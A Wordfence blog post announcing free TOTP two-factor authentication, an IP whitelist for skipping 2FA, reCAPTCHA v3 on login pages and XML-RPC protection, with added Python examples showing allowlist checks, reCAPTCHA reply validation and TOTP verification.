The new Wordfence 2FA feature leverages authenticator applications and services that support the time-based one-time password (TOTP) standard. There are many of them to choose from on the market; Google Authenticator, Authy, FreeOTP and 1Password are just a few. Many of you are probably already using one of these. For those who aren’t, they are incredibly easy to set up and use.

After entering your password, you simply enter the 6 digit login code from your authenticator app.

Wordfence 2FA is Now Available For Free

2FA is now available for use on sites running both the free and Premium versions of Wordfence. When we first added 2FA to Wordfence roughly 6 years ago, we leveraged SMS to send you a text message with a 2FA code when logging in to your site. Since sending SMS messages costs money, we made it a Premium-only feature. A couple of years ago we added an authenticator app option in addition to SMS.

The previous iteration of our 2FA feature is now being phased out completely and the replacement no longer includes an SMS option. Sites with the old version activated are able to continue to use it, but are strongly encouraged to transition to the new one. SMS is a less secure way to deliver login codes and is prone to delivery issues. In fact, NIST now specifically recommends against using SMS-based authentication.

Enable 2FA For Any User Role You Want

While it’s most important to protect your site’s admin accounts, there are plenty of other user roles with capabilities you don’t want to hand over to an attacker. Wordfence now lets you enable 2FA for any role you like. Simply visit the Settings tab on the Login Security page within Wordfence.

Whitelisted IPs That Bypass 2FA

This field accepts IP addresses or ranges from which 2FA will not be required. You can use it to skip 2FA on networks you trust, for example a static IP that you control. Another example is a trusted range of IPs, such as allowing users on your corporate network to log in without 2FA while still requiring it when they log in from outside that network.
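The decision the whitelist drives, as an added example written for this post (it is not Wordfence's own code): entries are normalised to integer ranges and a login is exempt from 2FA only when its role is protected and the client address falls inside a trusted entry. The accepted entry formats (single address, CIDR, dashed range) and the sample addresses are assumptions made for the example.

```python
import ipaddress
from typing import Iterable, List, Tuple

# Added example, not Wordfence code. Entry formats below are assumptions for
# this example: "203.0.113.10", "198.51.100.0/24", "192.0.2.20 - 192.0.2.30".
# Each entry becomes an inclusive (ip_version, first, last) integer range.
Range = Tuple[int, int, int]


def parse_allowlist(entries: Iterable[str]) -> List[Range]:
    ranges: List[Range] = []
    for raw in entries:
        entry = raw.strip()
        if not entry:
            continue
        if "-" in entry:
            lo_s, hi_s = (part.strip() for part in entry.split("-", 1))
            lo, hi = ipaddress.ip_address(lo_s), ipaddress.ip_address(hi_s)
            if lo.version != hi.version or int(lo) > int(hi):
                raise ValueError(f"invalid range: {entry!r}")
            ranges.append((lo.version, int(lo), int(hi)))
        elif "/" in entry:
            net = ipaddress.ip_network(entry, strict=False)
            ranges.append((net.version, int(net.network_address), int(net.broadcast_address)))
        else:
            addr = ipaddress.ip_address(entry)
            ranges.append((addr.version, int(addr), int(addr)))
    return ranges


def ip_in_allowlist(client_ip: str, ranges: List[Range]) -> bool:
    """True when client_ip lies inside any trusted range; unparsable input never matches."""
    try:
        addr = ipaddress.ip_address(client_ip)
    except ValueError:
        return False  # fail closed: a bad address must not bypass 2FA
    n = int(addr)
    return any(v == addr.version and lo <= n <= hi for v, lo, hi in ranges)


def requires_2fa(client_ip: str, role: str, protected_roles: set, ranges: List[Range]) -> bool:
    """2FA is required when the role is protected and the source IP is not trusted."""
    if role not in protected_roles:
        return False
    return not ip_in_allowlist(client_ip, ranges)


# Constructed sample configuration (documentation address blocks).
PROTECTED_ROLES = {"administrator", "editor"}
RANGES = parse_allowlist(["203.0.113.10", "198.51.100.0/24", "192.0.2.20 - 192.0.2.30"])

if __name__ == "__main__":
    for ip, role in [("198.51.100.77", "administrator"), ("203.0.113.99", "administrator"), ("203.0.113.99", "subscriber")]:
        print(ip, role, "needs 2FA" if requires_2fa(ip, role, PROTECTED_ROLES, RANGES) else "exempt")
```

The client address fed into this check must be the TCP peer address, or a forwarding header only when it is set by a reverse proxy you control; otherwise a client-supplied header would let an untrusted source claim a whitelisted address.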

New Login Page CAPTCHA Feature

In recent years the number of IoT devices has exploded. Unfortunately they have been highly prone to security vulnerabilities. This has resulted in a massive increase in the size of botnets available for attackers. In the context of login security for WordPress, this means that attackers have more compromised machines, and IPs, to use in their attacks. By spreading attacks across much larger pools of IP addresses they are able to dial the number of login attempts made by each IP address down so far that they evade even the most aggressive login attempt limiting rules, at least at the site level.

Earlier in the year we experienced an attack just like that, where the attacker was leveraging hundreds of thousands of IP addresses in a very sophisticated manner. We determined that in order to effectively thwart the attack our best option would have been to deploy CAPTCHA protection on our login page, effectively nullifying the attack.

As is often the case, a solution to a problem we’re facing with WordPress security becomes a great product idea. You are now able to enable Google reCAPTCHA v3 on your login and registration pages using Wordfence. It does a fantastic job of blocking bots from attempting to log in while allowing humans through without incident.

As a fail-safe, any user that Google erroneously deems to be a bot (and who does not have 2FA active) may continue logging in by clicking a verification link in an email sent to the account’s email address. User registration attempts that are blocked may also send an email to the email address configured for site administration, which is rate limited to prevent abuse.
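What a server has to check before it trusts a reCAPTCHA v3 result, and how the notification e-mails described above can be rate limited, as an added example (not Wordfence's implementation). The JSON fields (`success`, `score`, `action`, `hostname`, `error-codes`) follow Google's documented siteverify reply; the sample replies, the threshold of 0.5, the action names and the hostname are constructed for the example.

```python
import json
from dataclasses import dataclass
from typing import List

# Added example, not Wordfence code. Evaluates a siteverify JSON reply the way a
# login handler should: the token must be valid, bound to the expected action
# and hostname, and carry a score at or above the site's threshold.


@dataclass
class CaptchaDecision:
    allow: bool
    reason: str


def evaluate_siteverify(body: str, expected_action: str, expected_hostname: str,
                        min_score: float = 0.5) -> CaptchaDecision:
    try:
        data = json.loads(body)
    except ValueError:
        return CaptchaDecision(False, "unparsable siteverify response")
    if data.get("success") is not True:
        codes = ",".join(data.get("error-codes", [])) or "unknown"
        return CaptchaDecision(False, f"token rejected: {codes}")
    # v3 tokens are minted for a named action; a token for "register" must not
    # unlock "login", and a token minted for another site must not be accepted.
    if data.get("action") != expected_action:
        return CaptchaDecision(False, "action mismatch")
    if data.get("hostname") != expected_hostname:
        return CaptchaDecision(False, "hostname mismatch")
    score = data.get("score")
    if isinstance(score, bool) or not isinstance(score, (int, float)):
        return CaptchaDecision(False, "score missing")
    if score < min_score:
        return CaptchaDecision(False, f"score {score} below threshold {min_score}")
    return CaptchaDecision(True, "ok")


class EmailRateLimiter:
    """At most `limit` notification e-mails per `window` seconds (constructed policy)."""

    def __init__(self, limit: int, window: float) -> None:
        self.limit, self.window = limit, window
        self._sent: List[float] = []

    def allow(self, now: float) -> bool:
        self._sent = [t for t in self._sent if now - t < self.window]
        if len(self._sent) >= self.limit:
            return False
        self._sent.append(now)
        return True


# Constructed sample replies in the siteverify format.
HUMAN_RESPONSE = json.dumps({"success": True, "score": 0.9, "action": "login",
                             "hostname": "example.com", "challenge_ts": "2019-05-28T12:00:00Z"})
BOT_RESPONSE = json.dumps({"success": True, "score": 0.1, "action": "login", "hostname": "example.com"})
WRONG_ACTION = json.dumps({"success": True, "score": 0.9, "action": "register", "hostname": "example.com"})
BAD_TOKEN = json.dumps({"success": False, "error-codes": ["timeout-or-duplicate"]})

if __name__ == "__main__":
    for name, body in [("human", HUMAN_RESPONSE), ("bot", BOT_RESPONSE), ("bad token", BAD_TOKEN)]:
        print(name, evaluate_siteverify(body, "login", "example.com"))
```

A low score is the branch the post's fail-safe covers: the handler would send the verification link (subject to the limiter) rather than simply refusing, so a human mis-scored by Google still has a way in.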

Improved XML-RPC Protection

XML-RPC is an interface that allows WordPress to communicate with other applications. It is unfortunately often overlooked by WordPress users when discussing login security. “Just move your login page and you’re secure!” they say with bravado. Unfortunately they are often wrong. In the last 30 days, 60.6% of the login attempts blocked by Wordfence were hitting XML-RPC, not the site’s login page.

Fortunately there is a way to secure XML-RPC as well, with the new login security features in Wordfence.

Disabling XML-RPC

Because XML-RPC is such a popular target for attackers, we strongly recommend that you figure out whether you need it or not. If you do, protect it with 2FA if possible. If you don’t use the WordPress app or the Jetpack plugin it is likely safe for you to disable XML-RPC.

If you don’t need it, disable it. Once you know it is safe to do so, disabling it is as easy as checking a box in your Wordfence settings. Just be aware that it may cause you problems in the future should you start using an app or plugin that requires it.

Two-Factor Authentication for XML-RPC

If you have a custom application that logs in via XML-RPC, it can be configured to append a TOTP code when logging in using Wordfence. This option allows you to protect your XML-RPC endpoint from brute force attacks while making it available for your custom app. Unfortunately most off-the-shelf plugins and apps that utilize XML-RPC cannot be configured to use 2FA just yet, but with Wordfence you’ll be ready for when they can.
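The TOTP mechanism behind both the login code in the 2FA section above and the XML-RPC option here, as an added example that is not Wordfence code: RFC 6238 with HMAC-SHA1, a 30-second step and 6 digits, which is what the authenticator apps named earlier compute, plus a verifier with a one-step tolerance window and a replay guard. The "password followed by the six-digit code" layout used for the XML-RPC check is an assumption made for this example; the secret is the RFC test-vector key, base32-encoded, so the expected codes can be checked against the RFC.

```python
import base64
import hashlib
import hmac
import struct
import time

# Added example, not Wordfence code: RFC 6238 TOTP (HMAC-SHA1, 30 s step, 6
# digits) and a server-side check for an XML-RPC login where the client
# appends its current code to the password (layout assumed for the example).
STEP_SECONDS = 30
DIGITS = 6


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret_b32: str, at: float) -> str:
    """Code an authenticator app would show at Unix time `at`."""
    secret = base64.b32decode(secret_b32.upper().replace(" ", ""))
    return hotp(secret, int(at) // STEP_SECONDS)


class TotpVerifier:
    """Accepts the current step and `window` neighbours; each step is usable once."""

    def __init__(self, secret_b32: str, window: int = 1) -> None:
        self.secret = base64.b32decode(secret_b32.upper().replace(" ", ""))
        self.window = window
        self.last_counter = -1  # highest step already consumed (replay guard)

    def verify(self, code: str, at: float) -> bool:
        if len(code) != DIGITS or not code.isdigit():
            return False
        counter = int(at) // STEP_SECONDS
        for delta in range(-self.window, self.window + 1):
            c = counter + delta
            if c <= self.last_counter:
                continue  # a code from an already-used step is never accepted again
            if hmac.compare_digest(hotp(self.secret, c), code):
                self.last_counter = c
                return True
        return False


def authenticate_xmlrpc(supplied: str, stored_password: str, verifier: TotpVerifier, at: float) -> bool:
    """Split 'password<6 digits>' and require both parts to be correct.

    A real deployment compares against a password hash; a plain constant-time
    comparison stands in for that here.
    """
    if len(supplied) <= DIGITS:
        return False
    password, code = supplied[:-DIGITS], supplied[-DIGITS:]
    if not hmac.compare_digest(password.encode(), stored_password.encode()):
        return False
    return verifier.verify(code, at)


# RFC 6238 test-vector secret ("12345678901234567890") in base32; constructed demo password.
EXAMPLE_SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"
EXAMPLE_PASSWORD = "correct horse battery staple"

if __name__ == "__main__":
    now = time.time()
    print("current code:", totp(EXAMPLE_SECRET, now))
    v = TotpVerifier(EXAMPLE_SECRET)
    print("xml-rpc login:", authenticate_xmlrpc(EXAMPLE_PASSWORD + totp(EXAMPLE_SECRET, now),
                                                EXAMPLE_PASSWORD, v, now))
```

The replay guard is what turns a 30-second code into a one-time code: without it, a credential captured from one XML-RPC request stays valid for the rest of the step and the tolerance window around it.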

Conclusion

In this age of massive botnets and constant data breaches, login security has become increasingly important. These new features combined with our existing ones will provide you with the tools you need to implement the layered security approach that will keep your site safe. We strongly recommend that you upgrade to the latest version of Wordfence if you haven’t done so already, and invest the time to enable these powerful new features.

Thanks and stay safe!

The post Announcing 3 New Login Security Features appeared first on Wordfence.
